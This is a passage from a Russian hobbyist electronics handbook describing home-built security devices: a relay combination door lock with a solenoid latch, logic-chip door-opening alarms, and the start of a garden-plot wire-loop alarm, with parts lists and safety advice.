Вероятность безотказной работы устройства при

риске заказчика в =0,9, не менее .......... 0,98

sd1.jpg

Рис. 2.10. Принципиальная схема быстродействующего охранного устройства.

Рис. 2.10. Принципиальная схема быстродействующего охранного устройства.

Изображение: 

Таблица 2.13. Моточные данные сетевою понижающею трансформатора питания Т1, примененного в быстродействующем охранном устройстве

Изображение: 

Таблица 2.14. Перечень основных комплектующих ЭРИ и ЭРЭ, примененных в быстродействующем охранном устройстве (окончание)

Изображение: 

Таблица 2.14. Перечень основных комплектующих ЭРИ и ЭРЭ, примененных в быстродействующем охранном устройстве

Изображение: 

2.11. Простой релейный охранный автомат

2.11. ПРОСТОЙ РЕЛЕЙНЫЙ ОХРАННЫЙ АВТОМАТ

Релейный автомат предназначен для установки на входных дверях жилых домов, помещении, внутренних дверях производственных объектов и т. д.

В устройстве применены покупные комплектующие ЭРИ и ЭРЭ, которые рассчитаны на эксплуатацию в условиях климатических и механических нагрузок. Это устройство, конструктивно изготовленное достаточно герметично, может работать при температуре окружающего воздуха от —30 до 45 °С, при относительной влажности окружающей среды до 90% при температуре 25 °С и при пониженном атмосферном давлении до 5 мм рт. ст.

Работает релейный автомат от сети переменного тока напряжением 220 или 127 В частотой 50 Гц. Источник электропитания может быть выполнен в двух вариантах:

в виде встроенного узла, составляющего единое целое с релейным автоматом, и в виде автономного источника постоянного тока напряжением 24 В.

Принципиальная электрическая схема простого релейного охранного автомата приведена на рис. 2. 11. Рассматриваемый релейный автомат включает при правильном наборе шифра электромагнит открывания дверей. Шифр автомата устанавливается включением перемычек, три из которых являются рабочими, а остальные фальшивыми. Таким образом, расшифровка заключается в правильном наборе трех цифр шифра на специальном щитке с кнопками. Следует заметить, что каждой цифре кода соответствует своя кнопка, которую необходимо нажать при наборе. Порядок соединения контактов переключателей должен быть строго определенным.

Как следует из электрической схемы, релейный автомат включает в свой состав входные цепи, сетевой понижающий трансформатор питания Т1, выпрямительное устройство для электропитания обмоток реле, схему релейного автомата, выходные цепи и ИМ со звуковой или световой сигнализацией.

Подключение релейного автомата к сети переменного тока обеспечивается электрическим переключателем X1 типа «вилка» и штепсельной розеткой. Малогабаритный двухполюсный переключатель S1 служит для подачи электропитания на ИМ, электрический звонок и релейный автомат. На входе устройства собран емкостный фильтр на конденсаторах С1 и С2, защищающий его от ложных срабатываний и электромагнитных помех, которые проникают в сеть питания. Два плавких предохранителя F1 и F2 защищают входные цепи и элементы схемы от перегрузок и коротких замыканий, которые могут возникнуть по различным причинам: из-за неисправности ЭРЭ, неправильного монтажа элементов, неправильного включения трансформатора и др.

Сетевой понижающий трансформатор питания Т1, примененный в охранном устройстве, относится к числу унифицированных трансформаторов типа ТПП. Он рассчитан на подключение к сети переменного тока напряжением 110, 127, 220 и 237 В. На выводах вторичных обмоток трансформатора действует переменное напряжение от 2, 5 до 10 В. Изготавливается трансформатор на витом ленточном магнитопроводе типа ШЛ или ШЛМ с уменьшенным расходом меди. Наматывается одна катушка, которая устанавливается на центральный стержень с активной площадью поперечного сечения стали не менее 6,5 см2. Вместо унифицированного покупного трансформатора питания можно применить самодельный, изготовленный в соответствии с техническими характеристиками, изложенными в табл. 2.15. Сетевой трансформатор можно изготовить на магнитопроводе, шихтованном из пластин электротехнической стали типа Ш20х30 с двумя или тремя обмотками.

Сетевой трансформатор Т1 выполняет функцию трансформации высокого напряжения переменного тока 220 В в низкое напряжение, не превышающее 24В; обеспечивает гальваническую развязку первичных и вторичных цепей релейного автомата, относительную электрическую безопасность при работе с низковольтным напряжением, электропитание маломощного паяльника, расчетное значение выпрямленного напряжения постоянного тока, необходимого для электропитания электромагнитных реле К.1—К.4.

Если у радиолюбителя есть трансформатор, но неизвестны его тип и электрические параметры, то необходимо, пользуясь простым омметром, определить расположение выводов всех обмоток трансформатора. Как правило, вторичная отмотка трансформатора имеет сравнительно небольшое число витков достаточно толстого

Таблица 2.15.Моточные данные сетевого понижающего трансформатора питания Т1, примененного в простом релейном охранном автомате

2-111.jpg

провода, значит, по этому признаку можно предварительно определить выходные обмотки. Но иногда это сделать невозможно, если таких обмоток много и они предназначены для выполнения различных функций (накальные, анодные, для питания ППП и др.).

При наличии зазора между катушкой и магнитопроводом на катушку поверх обмоток наматывают одну дополнительную обмотку с максимально возможным количеством витков. На одну из вторичных обмоток этого трансформатора подают напряжение переменного тока 5 В. Измерив напряжение на каждой обмотке трансформатора, в том числе и на дополнительной, определяют число витков любой обмотки по известным формулам, пользуясь исходными данными.

На выходе сетевого трансформатора собран полупроводниковый выпрямитель на четырех диодах по однофазной двухполупериодной мостовой схеме. Так как на выходе вторичных обмоток трансформатора действуют напряжения переменного тока меньше расчетного значения, необходимо включить вторичные обмотки последовательно, как показано на схеме. Выпрямитель, собранный по мостовой схеме, имеет ряд положительных и отрицательных параметров и характеристик. К положительным относятся: повышенная частота пульсации выпрямленного напряжения постоянного тока на выходе выпрямителя; уменьшенная величина обратного напряжения, действующего на комплекте выпрямительных диодов; более полное использование габаритной мощности сетевого трансформатора Т1. К отрицательным — несколько увеличенные потери мощности, более низкий кпд, невозможность установки выпрямительных диодов на одном металлическом радиаторе без промежуточных изоляционных прокладок, повышенный расход полупроводниковых диодов и более высокая стоимость изготовления этого выпрямителя.

Выпрямитель работает на емкостный фильтр, собранный па электролитическом конденсаторе СЗ, который служит для дополнительного сглаживания пульсации постоянного тока.

На выходе вторичных обмоток сетевого трансформатора в режиме номинальной нагрузки действует переменное напряжение: на выводах 11 и 12 действует напряжение 10 В, если на первичную обмотку подано напряжение 220 В (выводы 2 и 9); на выводах 13 н 14 — 10 В; на

выводах 15 и 16 — К) В; на выводах 17 н 18 — 10 В; на выводах 19 н 20 — 5В и на выводах 21 и 22 — 5 В.

В данном автомате применен трехзначный шифр, который набирается установлением перемычек между соединителями Х2 Х15. Как видно из схемы, перемычки между контактами Х2 н ХЗ, Х8 и Х9, X11 и Х15 соединены между собой и подключены к обмотке реле К4. Перемычки между Х4 и Х5 соединяются с обмоткой реле К1, перемычка между X6 и Х7 соединяется с обмоткой реле К2 и перемычка между контактами Х10 и X11 — с обмоткой реле КЗ. Таким образом, рабочими перемычками в данном наборе являются перемычки между контактами Х4 и Х5, Х6 и Х7, X10 и X11. Остальные перемычки - дежурные. Следует заметить, что в данном случае зашифровано число 235, но если переставить эти перемычки, то можно установить практически любое число, составленное из цифр от 1 до 7.

Для того чтобы войти в помещение, необходимо последовательно, в установленном порядке нажать кнопки переключателей S4, S5 и S7. Каждой цифре соответствует своя кнопка, которая нажимается при наборе номера. При этом первая цифра шифра всегда является вилкой, подключаемой к контакту Х5, вторая цифра соответствует вилке, подключаемой к контакту Х7, и третья цифра кода соответствует вилке, подключаемой к контакту X11. Теперь, если надо зашифровать номер, например 751, то необходимо вилку с контакта Х5 переключить на контакт Х15, вилку с контакта Х7 — на контакт X11, а вилку с X11 — на контакт ХЗ. Остальные вилки, соединенные с обмоткой реле К4, подсоединить к оставшимся свободными контактам.

Релейный автомат работает следующим образом. Зная установленный шифр — 235, сначала нажимается кнопка переключателя S4, соответствующая цифре 2, тем самым подается постоянное напряжение на обмотку реле К1, которое срабатывает, переключая свои контакты. Замкнутые контакты реле К1.1 блокируют нажатую кнопку S4, и ее можно отпустить — реле К1 останется под напряжением; затем нажимается кнопка S5, контакты которой замыкают цепь питания реле К2, оно срабатывает, замыкая свои контакты К2.1 и К2.2. Контакты К2.1 самоблокируют питание реле К2, а контакты К2.2 подготавливают реле КЗ к срабатыванию, если следующая цифра также будет набрана правильно. И теперь, нажав на кнопку S8, соответствующую цифре 5, напряжение будет подано на реле К3. Контакты сработавшего реле КЗ (КЗ.1) заблокируют питание этого реле, а контакты КЗ.2 при замыкании подадут питание на электромагнит, установленный на двери. Сердечник ЭМ1 втягивается внутрь обмотки и открывает механический замок.

Электромагнитные реле К1-КЗ остаются включенными в течение всего времени набора шифра и до тех пор, пока дверь не будет oткрыта, то есть будут разомкнуты контакты конечного выключателя S2, установленного скрытно на дверях. Эти контакты включены последовательно с обмотками электромагнитных реле. При размыкании контактов S2 питающее напряжение снимается со всех реле. Они обесточиваются, подготавливая автомат к приходу следующего посетителя.

Для защиты объекта от вторжения посторонних лиц, не знающих шифра, в принципиальную схему включено дополнительное электромагнитное реле К4. Его обмотка соединена с вилками контактов ХЗ, Х9, Х13, Х15, которые соединены со свободными контактами. И только стоит нажать на одну из этих кнопок, как реле К4 сработает и разомкнет контакты К4.1 и цепь питания реле.

Теперь, если посторонним лицом были случайно правильно набраны одна или две цифры кода, они сбросятся, и придется набирать весь шифр снова, с самого начала. Причем одновременно со сбросом набранных цифр прозвенит звонок ВА1, питание на который подается через контакты К4.2 при срабатывании реле К4.

При изготовлении релейного автомата использованы следующие комплектующие ЭРИ и ЭРЭ: выпрямительные диоды VD1— VD4 типа КД105Б; электромагнитные реле К1—КЗ типа РЭС-9, РСМ, РВМ-2С-110; самодельный или покупной сетевой понижающий трансформатор питания Т1 типа ШЛМ; конденсаторы С1 типа МБМ-II-750В-0.05 мкФ, С2 — МБМ-II-750В-0,05 мкФ, СЗ — К50-3-50В-100 мкФ; предохранители F1. F2 типа ПМ-1-0,5 А; электрические соединители X1 типа «вилка», Х2—Х15 типа КМЗ-1; светодиод HL1 типа АЛ307В; диод VD5 типа Д223; резистор R1 типа МЛТ-0,25-2,4 кОм; переключатели S1 двухполюсный типа ТП2-1 или П2Т-1-1, S2 — КМ1-1, S3— S9 — КП-1 с одним постоянно разомкнутым контактом; электромагнит ЭМ1 самодельной конструкции или покупной с напряжением питания 220 В; звонок электрический ВА1 покупной.

Конструктивно релейный автомат состоит из нескольких самостоятельных сборочных единиц: шифровальной и дешифровальной сборки, в которой устанавливаются малогабаритные приборные контакты и перемычки; выпрямительного устройства с электромагнитными реле;

электромагнита в качестве ИМ и замка с защелкой;

кнопочной коробки; электрического звонка и сигнальной лампы.

Соединения всех узлов и сборок между собой рекомендуется осуществлять с помощью электрических соединителей. Многие детали конструкции можно изготовить в домашней мастерской (особенно те, которые входят в механический замок).

Сетевой трансформатор, выпрямительное устройство и электромагнитные реле монтируются в пластмассовой или металлической коробке подходящих размеров, которая устанавливается в охраняемом помещении недалеко от входной двери. На передней панели корпуса коробки укрепляются гнезда или приборные клеммы. На вилках, подключенных проводниками к электромагнитным реле К1—КЗ, необходимо написать номера этих реле, что позволит быстро и безошибочно устанавливать ежедневный шифр из трех знаков. Остальные вилки от реле К4 не обозначаются, так как они вставляются в свободные гнезда.

Для монтажа подходят любые электромагнитные реле, рассчитанные на 24 В и имеющие нормально замкнутые и нормально разомкнутые контакты. В качестве выпрямительных диодов можно применить выпрямительные диоды типа Д202—Д205.

Электромагнит вместе с пружинным механическим замком устанавливается на входной двери. Замок дорабатывается в следующем порядке. Необходимо сначала снять крышку и вынуть подвижную часть замка. На его направляющих просверливаются два отверстия диаметром по 2 мм, в которые вставляются стальные проволочные тяги. На боковой поверхности замка просверливаются тоже два отверстия диаметром до 4 мм, через которые пропускаются эти проволочные тяги. Замок вновь собирается, крышка возвращается на место. Устанавливая замок и электромагнит на место, надо обратить внимание на длину рычага, входящего в замок от открывающегося ключом механизма. Длина проволоки определяется по месту.

В релейном автомате может быть применен соленоид, изображенный на рис.2.12. Условно в состав конструкции соленоида входят неподвижный и жестко укрепленный в

2-112.jpg

Рис. 2.12. Конструкция соленоида.

задней части катушки соленоида дополнительный сердечник 1; диэлектрический каркас катушки 2 с обмоточным проводом 3 марки ПЭЛ, ПЭВ-1 или ПЭВ-2; к вспомогательному сердечнику 1 прикреплена(приклеена)тонкая шайба из картона или бумаги 4; провод катушки сверху закрыт изоляционной лентой 5 или плотным диэлектрическим кожухом; сердечник соленоида 6, который так же, как и вспомогательный сердечник, изготавливается из мягкого железа (электротехнической стали марок 3311, 3312, 3313). На катушку соленоида надо намотать рядовой намоткой 4500 витков обмоточного провода марки ПЭВ-1 диаметром 0,31 мм. Дополнительные детали конструкции соленоида необходимо выполнить при его установке вместе с замком на входной двери по эскизному рис. 2.13, где 1 — соленоид; 2 — переходная соединительная втулка; 3 — стальная проволочная тяга (2 шт);

4 — ригельный замок; 5 — входная дверь.

Электрическое соединение всех узлов релейного автомата осуществляется многожильным кабелем в электропрочной изоляции. В местах перегибов монтажных проводов, например между дверью и стеной, на кабель надеваются мягкие резиновые трубки и оставляется некоторый запас кабеля. Это предохранит его от перетирания при частом открывании входных дверей.

Дверную блокировочную кнопку-переключатель тоже можно изготовить самостоятельно из двух латунных пластинок, первая из которых укрепляется на подвижной части двери, а вторая — на косяке или коробке двери.

2-113.jpg

Рис. 2.13. Установка соленоида и механического замка на входной двери охраняемого объекта.

Правильно собранная электромонтажная схема релейного автомата начинает работать сразу же после включения электропитания.

Радиолюбитель, выполняя различные электромонтажные работы, должен знать основные правила безопасности, позволяющие сделать минимальным воздействие неблагоприятных факторов в отношении не только себя, но и окружающих.

При работе с электричеством необходимо любые действия производить вдали от водопроводных труб, радиаторов парового отопления и ванн, исключить даже случайное прикосновение к ним; заменять детали при ремонте следует только после отключения блоков релейного автомата от сети, обязательно вынимая вилку со шнуром питания из сетевой розетки; после отключения источника электропитания обязательно разрядить конденсатор СЗ;

нельзя проверять исправность плавких предохранителей в устройстве путем замыкания их.

Основные электрические параметры и технические характеристики простого релейного охранного автомата

Номинальное напряжение питающей сети неременного тока, В ....................... .220 или 127

Номинальная частота питающей сети переменного

тока, Гц ............................ .50

Номинальное напряжение автономного источника

питания постоянного тока, В .............. .24

Номинальное напряжение питания электромагнитных реле, В ......................... .24

Коэффициент нелинейных искажений питающей сети переменного тока, %, не более ......... .10

Пределы изменения напряжения питающей сети переменного тока, В .................... .187...242 или

110... 140

Пределы изменения напряжения автономного

источника питания, В ................... 20...25

Пределы изменения частоты питающей сети

переменного тока, Гц ................... 49...51

Напряжение на выводах вторичных обмоток сетевою трансформатора питания Т1, В:

11 и 12, 13 и 14, 15 и 16, 17 и 18 ......... 10

21 и 22, 23 и 24 ..................... 2,5

Количество одновременно охраняемых объектов, шт . . 1

Количество цифр в шифре, шт .............. 3

Количество вариантов комбинации релейного

автомата при наборе шифра, шт ............ 1000

Максимальная мощность релейного автомата при

срабатывании электромагнита, Вт, не более .... 100

Количество разрядов кодовой комбинации ....... 7

Срок службы, ч, не менее .................. 10 000

Сопротивление изоляции реле в нормальных условиях эксплуатации, МОм, не менее .......... 20

Время отпускания реле, мс, не более .......... 7

Вероятность безотказной работы автомата при

риске заказчика в=0,92, не менее .......... 0,98

Задержка времени срабатывания релейного автомата, с, не более ..................... 0,5

Ток, потребляемый устройством в режиме холостого хода, мА, не более .................. 20

Минимальная мощность электромагнита, Вт ..... 60

Условия эксплуатации:

температура окружающей среды, °С ......... —25. ..4-45

относительная влажность воздуха при температуре 25 °С, %, не более ................. 92

атмосферное давление, мм рт. ст. ........... 200...900

xd1.jpg

Рис. 2.11.Принципиальная схема простого релейного охранного автомата.

 

Рис. 2.11.Принципиальная схема простого релейного охранного автомата.

Изображение: 

Рис. 2.12. Конструкция соленоида.

Изображение: 

Рис. 2.13. Установка соленоида и механического замка на входной двери охраняемого объекта.

Изображение: 

Таблица 2.15.Моточные данные сетевого понижающего трансформатора питания Т1, примененного в простом релейном охранном автомате

Изображение: 

2.12. Электронные охранные устройства, сигнализирующие об открывании входных дверей помещений

2.12. ЭЛЕКТРОННЫЕ ОХРАННЫЕ УСТРОЙСТВА, СИГНАЛИЗИРУЮЩИЕ ОБ ОТКРЫВАНИИ ВХОДНЫХ ДВЕРЕЙ ПОМЕЩЕНИЙ

Существует много простых, надежных и долговечных электронных устройств, которые сигнализируют о нежелательном открывании дверей или окон. Самым простым и в то же время безотказным решением задачи охраны является применение микропереключателей, позволяющих разрывать или замыкать электрические цепи как в режиме холостого хода, так и в режиме рабочей нагрузки (некоторые их типы см. в табл. 3. 3). В отличие от простого электрического переключателя герметичный контакт (геркон), переключаемый постоянным магнитом, без сложных переделок и изменений можно использовать только для включения или выключения сторожевых устройств. В этом случае при открывании двери или окна геркон должен переходить, из одного конечного состояния в другое.

Существует большое количество вариантов установки переключателей, среди них наиболее интересные — со скользящими контактами. При открывании двери или створок окна контакт в скользящем переключателе испытывает воздействие электромагнитного поля. Это дает возможность производить запуск сигнального устройства, в котором применен триггер, срабатывающий при открывании дверей даже на очень короткое время. При этом необходимо учитывать, что если триггер находится на значительном расстоянии от контакта, установленного на двери, следует предусмотреть в схеме устройства монтаж электрической цепочки тина RC на входе триггера для предотвращения ложных срабатываний.

Важное значение для устойчивой работы охранных устройств имеет качество и надежность срабатывания конечных выключателей и контактов. Открытые контакты всегда подвержены воздействию внешних атмосферных факторов и нагрузок, среди которых особенно опасной является повышенная относительная влажность окружающей среды. Поэтому через контакты конечных выключателей должен течь лишь минимально допустимый ток или должно подаваться определенное минимально допустимое напряжение для предотвращения искрения и образования на поверхностях этих контактов нагара.

При изготовлении ЭУОС и при прокладке электрических цепей от электронных блоков и пультов управления до замыкающих и размыкающих контактов необходимо выполнять строго определенные правила и рекомендации. Например, электрический переключатель, рассчитанный на максимальный ток 10А, допускает минимальный ток 100мА, если речь идет о замыкающих контактах. Но в принципе можно следовать такому проверенному практикой правилу: контактные устройства, предназначенные для меньших максимально допустимых токов, наиболее пригодны для небольших рабочих токов. Это необходимо учитывать также тогда, когда пружины контактов переключателей играют роль и самих контактов. При этом рекомендуется предусмотреть в схеме параллельное резервирование для нормально разомкнутых контактов. Но ток в этом случае распределяется между несколькими контактами. Для монтажа схем с нормально замкнутыми контактами более целесообразным является последовательное резервирование, обеспечивающее предотвращение возможного залипания контактов. Тогда из нескольких последовательно включенных контактов сработает по меньшей мере один.

При протекании токов до 10мА необходимо учитывать также переходное сопротивление контактов, которое иногда является решающим фактором для надежной работы всего охранного устройства.В некоторых контактных парах это сопротивление может достигнуть десятков Ом.

Используемые в электронных схемах контакты герметичных типов имеют преимущества перед открытыми контактами, так как связаны с ограничением минимального тока, который иногда не превышает 1 мА, простотой установки и высокой надежностью срабатывания. Постоянные магниты, необходимые для таких контактов, можно использовать от магнитных защелок, применяемых при изготовлении мебели.

Если контакты, устанавливаемые на дверях или окнах, расположены на значительном расстоянии от БЭ, пульта управления или от источника электропитания, то потребуется надежная профессиональная прокладка соединительных проводов. Для начинающих радиолюбителей эта работа должна всегда оставаться на первом месте и тщательно выполняться, особенно в тех случаях, когда проводка предназначена для передачи высокого напряжения переменного тока 220 В.

Рекомендуется домашним мастерам с первых же самодельных, а также покупных УОС вести запись всех линий проводки и проводников в квартире, доме на приусадебном участке или в других помещениях с указанием места и направления прокладки, а также цвета проводов и типа соединений. Это правило обеспечивает максимально возможную электробезопасность и условия устойчивой и долговечной работы самодельных ЭУОС.

На садово-огородных участках для соединения проводниками всех контролируемых объектов и отдельных мест, расположенных как по периметру охраняемого участка, так и внутри дома, можно рекомендовать последовательное включение датчиков и конечных выключателей, что потребует лишь одной линии связи. Но при этом контактные пары должны быть нормально замкнутыми. При разрыве какого-либо из этих контактов срабатывает сигнализация, однако информация о том, в каком месте произошел разрыв, отсутствует. При установке нормально разомкнутых контактов по месту необходимо применить один двухжильный провод. Но и в этом случае неизвестно, в каком месте сработал контакт.

Рассматриваемые УОС с большим количеством конечных выключателей и контактных пар менее критичны к воздействию различных условий эксплуатации, если они реализуются на базе малых или больших ИМС, а контакты соединяются в группы и подключаются к входам одной микросхемы. Однако это лучше делать только после того, как начинающим радиолюбителем будет собрано достаточно большое количество разнообразных РЭУ и приборов. Необходимо учитывать, что при прокладке длинных соединительных линий, подключаемых к ИМС, легко происходят ложные срабатывания и приходится принимать дополнительные меры защиты: например, при использовании нормально разомкнутых контактов емкость конденсаторов должна быть большой величины, чтобы импульс тока их зарядки не приводил бы к залипанию контактов; в этом случае лучше применять лакопленочные конденсаторы емкостью не менее 1мкФ.

Используя важнейшие и специальные свойства ИМС, в частности логической системы И-НЕ или 2И-НЕ, и поступление на ее входы потенциалов высокого уровня логической единицы, через которые текут очень маленькие токи, можно собрать на базе таких ИМС охранные устройства со световой сигнализацией на малогабаритных индикаторных лампочках, напряжения питания которых не превышают 5...6В, а ток на них не превышает 50мА. Сегодня очень часто в электронных схемах применяются вместо лампочек накаливания светодиоды, которые включаются через балластные резисторы. Большинство схем включения светодиодов содержат конденсаторы емкостью до 0,01мкФ и рассчитаны таким образом, что при срабатывании какого-либо контакта происходит передача сигналов на элементы микросхемы, благодаря чему загорается светодиод или лампочка накаливания, включенная между этим входом и плюсовым проводником схемы. На выходе такой ИМС низкий уровень логического нуля сменяется высоким уровнем логической единицы. Эта смена сигнала на выходе микросхемы используется или непосредственно для управления

2-121.jpg

Рис.2.14. Принципиальная схема устройства охраны с сигнализацией на одной микросхеме.

входом транзистора n-р-n-структуры, или после инвертирования для управления работой генератора.

На рис. 2. 14 приведена принципиальная электрическая схема устройства охраны с сигнализацией, собранного на одной ИМС. Это устройство предназначено для оповещения о состоянии входных дверей или окон, об их открывании и закрывании. Разработано устройство охраны для установки в домах и хозяйственных постройках бытового и производственного назначения, но область применения его может быть расширена по желанию домашнего мастера, учитывая возможности электронной схемы, тем более что в качестве датчиков могут быть использованы герметичные нормально замкнутые контакты, удерживаемые постоянным магнитом, самодельные конечные выключатели, унифицированные микропереключатели типа МП-1 и другие переключатели. Как видно из схемы, оксидный конденсатор С1 является конденсатором задержки срабатывания и включен параллельно датчику-контакту, замкнут накоротко через резистор R1, предназначенный для предотвращения перегрузки импульсов тока этого конденсатора при его разрядке.

При замкнутых контактах конечного выключателя в режиме ожидания охранного устройства на выходе ИМС DAI (выводы 1 и 2} действует низкий уровень логического нуля, в это же время на выходе ИМС (вывод 3) действует высокий уровень логической единицы. Надо заметить, что ИМС, использованная в устройстве, включает в себя четыре логических элемента 2И-НЕ, которые имеют соответствующие входы и выходы. Первый элемент схемы имеет выводы 1, 2 и 3; второй — 4, 5 и 6; третий — 8, 9 и 10; четвертый — 11, 12 и 13.

В режиме ожидания или холостого хода на выводе 4 (выход второго элемента ИМС) действует низкий уровень логического нуля; на выводе 10 (выход третьего элемента) действует высокий уровень, логической единицы и на выводе 11 ИМС (выход четвертого элемента) действует низкий уровень логического нуля. Вследствие этого транзистор VT1, подключенный к выходу 11 ИМС схемы через резистор ограничения тока, заперт.

При размыкании контактов конечного выключателя S1 начинается зарядка конденсатора С1 в течение заданного промежутка времени, который определяется номинальными значениями сопротивления резистора R2 и емкости конденсатора С1. Резистор R2 рассчитан на номинальное сопротивление 100кОм, которое можно изменять, меняя время задержки подачи сигнала открывания дверей охраняемого объекта в широких пределах.

При некотором оптимальном значении напряжения на конденсаторе С1 включается в работу тактовый генератор, собранный на первых двух элементах ИМС DA1 (выводы 1—б), вызывая подачу сигналов низкой частоты на вторую часть ИМС DA1, и начинают вырабатываться импульсы звуковой частоты, которые поступают на транзистор VT1, усиливаются и передаются на звукоизлучатель: громкоговоритель ВА1 или телефонный капсюль.

Телефонный капсюль, примененный в устройстве, может быть выбран из числа электромагнитных типа ТА-4, ДЭМ-4М, ТК-67.

Сторожевое устройство, собранное по указанной принципиальной схеме (рис.2.14), позволяет открывать и закрывать входные двери и окна без подачи звукового сигнала в период определенного времени. Конденсатор задержки подачи звукового сигнала можно включать и выключать с помощью однополюсного переключателя, который может быть введен в принципиальную схему, а на практике установлен в недоступном и скрытом от посторонних лиц месте. Такой же результат можно получить за счет отключения резистора, подсоединенного со стороны плюсового вывода источника питания GB1.

При сборке и регулировке охранного устройства использованы следующие покупные комплектующие ЭРИ и ЭРЭ: ИМС DA1 типа К176ЛА7; конденсаторы С1 типа К50-6-6,ЗВ-100мкФ, С2 — К53-1-6.3В-0.5 мкФ, СЗ — К10-7В-25В-680пФ; резисторы R1 типа МЛТ-0,25-100Ом, R2 — СПЗ-4М-0, 25Вт-100 кОм,

2-122.jpg

Рис 2.15. Принципиальная схема устройства охранной сигнализации.

R3 -- МЛТ-0,25-1 МОм, R4 — МЛТ-0,25-1 МОм, R5-МЛТ-0,25-1 кОм, R6 — МЛТ-0,25-1 МОм, R7 — МЛТ-0,25-1МОм;

транзистор VT1 типа КТ342А; выпрямительный диод VD1 типа Д237А; ХИТ GB1 типа 3336 или три элемента типа 373, «Орион-М».

Электропитание охранного устройства осуществляется от автономного источника постоянного тока напряжением 4,5 В.

Простота устройства при правильной сборке и монтаже обеспечивает ему надежную работу без дополнительной настройки и регулировки. Большое значение имеет качество комплектующих ЭРЭ и ЭРИ.

На рис.2.15 приведена принципиальная электрическая схема устройства охранной сигнализации, разработанная на одной ИМС и работающая аналогично рассмотренной выше. Эта принципиальная схема имеет меньшее количество комплектующих ЭРЭ, основным из которых также является ИМС, выполненная по КМОП-технологии. Данная ИМС в соответствии с принятой классификацией относится к числу логических схем и включает в свой состав четыре функциональных элемента типа 2И-НЕ. Она характеризуется высокими электрическими параметрами и незначительным потреблением электроэнергии.

Напряжение электропитания ИМС равно 9 В±5%;

ток потребления в состоянии логического нуля не превышает 2X10^(-4)мА; а в состоянии логической единицы — также не более 2X10—4мА; задержка включения и выключения ИМС не превышает 80 нс. К серии этих ИМС

относятся следующие типы: К176ЛА7, К164ЛА7, К561ЛЛ7, К564ЛА7.

Электропитание устройства осуществляется от ХИТ батареи типа 3336 или любых трех последовательно соединенных элементов типа 316, 332, 343, 373, «Планета», «Сатурн».

Транзистор VT1, включенный на выходе ИМС, выполняет функцию усилителя мощности. При замкнутых контактах переключателя S1 или если включить на выходе устройства переменный резистор (на схеме показан пунктирной линией), плюс питающего напряжения попадает на внутреннюю шину ИМС через один из диодов, минуя вывод 14. Следует заметить, что ИМС DA1 работает без подключения к выводу 14 источника питания от батареи GB1. После замыкания контактов S1 включается в работу первый ждущий мультивибратор, собранный на двух элементах ИМС (выводы 1, 2, 3, 4, 5, 6), который начинает вырабатывать прямоугольные импульсы, следующие с частотой 3 Гц. С выхода первого мультивибратора (вывод 4) эти импульсы поступают на вход второго мультивибратора (вывод 8), и он включается в работу и начинает вырабатывать импульсы частотой до 3000 Гц. В громкоговорителе или телефоне ВА1 слышится звук, который можно изменять переменным резистором R5.

При изготовлении данного устройства применены следующие комплектующие ЭРИ и ЭРЭ: транзистор VT1 типа КТ315Г:

ИМС DA1 типа К176ЛА7; резисторы R1 типа МЛТ-0,25-300 кОм, R2 — МЛТ-0,25-330кОм,R3—МЛТ-0,25-270кОм R4—МЛТ-0,25-15кОм,R5—СПЗ-1-0,25Вт-100кОм;телефон ВА1 типа ДЭМШ или ДЭМ-4М; переключатель S1 типа МП-1-1;

электрические соединители X1— Х4 типа КМЗ-1 приборные;

конденсаторы С1 типа К73-17-63В-1 мкФ, С2 — К10-7В-50В-М1500-1000 пФ.

Правильно собранное охранное устройство начинает работать сразу же после сборки и ни регулировки, ни настройки не требует. Необходимо заметить, что устройство не критично к выбору номиналов резисторов и конденсаторов. При их изменениях меняется тональность звуковых колебаний в громкоговорителе.

Рис 2.15. Принципиальная схема устройства охранной сигнализации.

Изображение: 

Рис.2.14. Принципиальная схема устройства охраны с сигнализацией на одной микросхеме.

Изображение: 

2.13. Электронный сторож для садово-огородного участка

2.13. ЭЛЕКТРОННЫЙ СТОРОЖ ДЛЯ САДОВО-ОГОРОДНОГО УЧАСТКА

Садово-огородные участки и приусадебные территории, расположенные вдали от централизованных пунктов охранной сигнализации и ЦПУ, удаленные от городов и городских поселков, где, как правило, находятся мощные и постоянно действующие подразделения охраны, а также отдельные садовые участки в больших массивах различных овощеводсв и садоводств, занимающих общую площадь в несколько десятков и сотен гектаров, требуют специальных мер защиты. Этот вопрос охраны особенно актуален в период созревания плодово-ягодных и овощных культур, когда хищения созревшего урожая становятся иногда массовым явлением.

Некоторые садоводства, объединенные в крупные товарищества, организуют совместную охрану территории с привлечением сотрудников милиции и других охранных структур. Однако их сторожевые посты находятся далеко не только друг от друга, но и от охраняемых участков, и в этом случае без специальных охранных устройств очень трудно осуществлять эффективную защиту в первую очередь жилых домов и хозпостроек.

Для решения этой проблемы все приведенные в справочнике электронные устройства достаточно надежны и долговечны, но сложны в изготовлении и эксплуатации. Рассматриваемые ниже электронные и релейные автоматы позволяют создавать системы, защищающие сады и огороды, так как могут быть установлены не только по периметрам участков, но и локально в одном или нескольких наиболее уязвимых местах. Например, вокруг плодовых деревьев (яблонь, груш, слив), грядок с клубникой, около кустов черной смородины и т. д. В этом случае в качестве основного охранного элемента схемы используется шлейф, изготавливаемый из тонкого обмоточного провода, который при обрыве дает сигнал на электронный блок охранного устройства.

Принципиальная электрическая схема электронного охранного устройства для охраны садов и огородов, собранного на ППП, приведена на рис. 2. 16. Схема включает в свой состав сетевой понижающий трансформатор питания Т1 унифицированной конструкции, выпрямительное устройство, стабилизатор напряжения регулируемого типа, триггер Шмитта, входные и выходные цени и шлейф. В конструкции охранного устройства можно выделить также самостоятельные сборочные единицы: БП, БЭ и устройство сигнализации.

Блок питания представляет собой законченную конструкцию, функции которой в радиолюбительской практике могут быть значительно расширены за счет его универсального выходного стабилизированного напряжения 12 В. Но следует заметить, что выходное напряжение можно регулировать переменным резистором R5 в достаточно широких пределах. БП можно использовать для электропитания различной радиолюбительской аппаратуры, радиоэлектронных устройств и приборов промышленного изготовления.

На входе устройства собран емкостный фильтр на конденсаторах С1 и С2, которые защищают устройство от низкочастотных помех, проникающих в сеть электропитания переменного тока. Конденсаторы фильтра соединены последовательно, с заземлением средней точки. Здесь же на входе установлен плавкий предохранитель F1, защищающий входные цепи устройства от перегрузок и коротких замыканий, которые могут возникнуть при ошибках в монтаже, при сборке из непроверенных комплектующих элементов, из-за случайных замыканий в токопроводящих частях. Плавкий предохранитель рассчитан на максимальный ток до 1 А. В номинальном режиме работы используется предохранитель на ток срабатывания 0, 5 А.

